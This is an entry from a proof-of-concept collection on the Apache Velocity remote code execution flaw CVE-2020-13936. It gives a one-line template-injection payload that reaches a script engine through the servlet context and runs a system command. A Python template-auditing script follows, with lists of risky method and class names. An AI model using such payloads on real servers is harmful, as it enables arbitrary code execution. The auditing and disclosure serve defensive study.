Awesome-POC/Web服务器漏洞/Apache Velocity 远程代码执行 CVE-2020-13936.md
2022-12-06 17:17:54 +08:00


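# Apache Velocity Remote Code Execution CVE-2020-13936
## Vulnerability Description
The Velocity Uberspector does not block access to the methods of the java.lang.ClassLoader class loader. When Velocity templates are used in a VelocityView context, an attacker who is able to modify a template can execute arbitrary Java code or run arbitrary system commands with the same privileges as the account running the Servlet container.
Reference links:
- https://securitylab.github.com/advisories/GHSL-2020-048-apache-velocity
## Vulnerability Reproduction
PoC: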
```
${req.getServletContext().getAttribute('org.apache.tomcat.InstanceManager').newInstance('javax.script.ScriptEngineManager').getEngineByName('js').eval("java.lang.Runtime.getRuntime().exec('touch /tmp/pwned')")}
```
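
A defensive template audit, as an added example that is not part of the original page or of Velocity itself: it scans template text for VTL references whose call chain reaches the class-loading, servlet-context or script-engine calls the PoC above relies on. The `RISKY_CALLS` and `RISKY_NAMES` lists and the function names are assumptions chosen for this example.

```python
import re

# Assumed review lists for this example (not taken from Velocity): method names
# and class-name fragments an ordinary view template has no reason to contain.
RISKY_CALLS = {"getClass", "getClassLoader", "loadClass", "forName", "newInstance",
               "getServletContext", "getEngineByName", "getRuntime", "eval", "exec"}
RISKY_NAMES = ("java.lang.Runtime", "java.lang.ProcessBuilder", "ClassLoader",
               "javax.script.", "InstanceManager")
REF_START = re.compile(r"\$!?\{?[A-Za-z_]")          # $name, $!name, ${name}, $!{name}
CALL = re.compile(r"\.\s*([A-Za-z_]\w*)\s*\(")       # .method(

def reference_end(text, i):
    """Index just past the VTL reference whose identifier is being read at i.
    Quoted strings and nested ( ) / [ ] stay inside the reference."""
    depth, quote = 0, None
    while i < len(text):
        ch = text[i]
        if quote:                                    # inside a string argument
            quote = None if ch == quote else quote
        elif depth and ch in "'\"":
            quote = ch
        elif ch in "([":
            depth += 1
        elif depth and ch in ")]":
            depth -= 1
        elif depth == 0 and not (ch.isalnum() or ch in "_."):
            return i + 1 if ch == "}" else i         # keep the brace of ${...}
        i += 1
    return i

def audit_template(text):
    """Return (line_number, reasons) for every reference that needs review."""
    findings, pos = [], 0
    while (m := REF_START.search(text, pos)):
        end = reference_end(text, m.end())
        ref = text[m.start():end]                    # includes calls inside string arguments
        reasons = sorted({c for c in CALL.findall(ref) if c in RISKY_CALLS} |
                         {n for n in RISKY_NAMES if n in ref})
        if reasons:
            findings.append((text.count("\n", 0, m.start()) + 1, reasons))
        pos = end
    return findings

# Line 1 is constructed benign markup; line 2 is the PoC shown on this page.
SAMPLE = """<p>Hello $!{user.name}: $number.format('currency', $cart.total)</p>
${req.getServletContext().getAttribute('org.apache.tomcat.InstanceManager').newInstance('javax.script.ScriptEngineManager').getEngineByName('js').eval("java.lang.Runtime.getRuntime().exec('touch /tmp/pwned')")}
"""
if __name__ == "__main__":
    print(audit_template(SAMPLE))
```

A hit marks the template for manual review, together with a check of who is able to edit it.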